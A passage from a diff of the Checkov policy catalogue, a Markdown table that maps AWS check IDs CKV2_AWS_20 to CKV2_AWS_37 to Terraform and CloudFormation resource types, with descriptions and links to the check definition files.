[EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 860 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 861 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 862 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 863 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 864 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | +| 865 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | +| 866 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | +| 867 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 868 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 869 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 870 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 871 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 872 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 873 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 874 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 875 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | +| 876 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | +| 877 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 878 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | +| 879 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | +| 880 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 881 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 882 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 883 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 884 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 885 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 886 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 887 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 888 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 889 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 890 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 891 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 892 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 893 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 894 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 895 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 896 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 897 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 919 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 940 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 941 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 942 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 943 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 944 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 945 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 946 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 947 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 948 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 949 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 950 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 951 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 952 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 953 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 954 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 955 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 956 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 957 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 958 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 959 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 960 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 961 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 962 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 963 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 964 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | 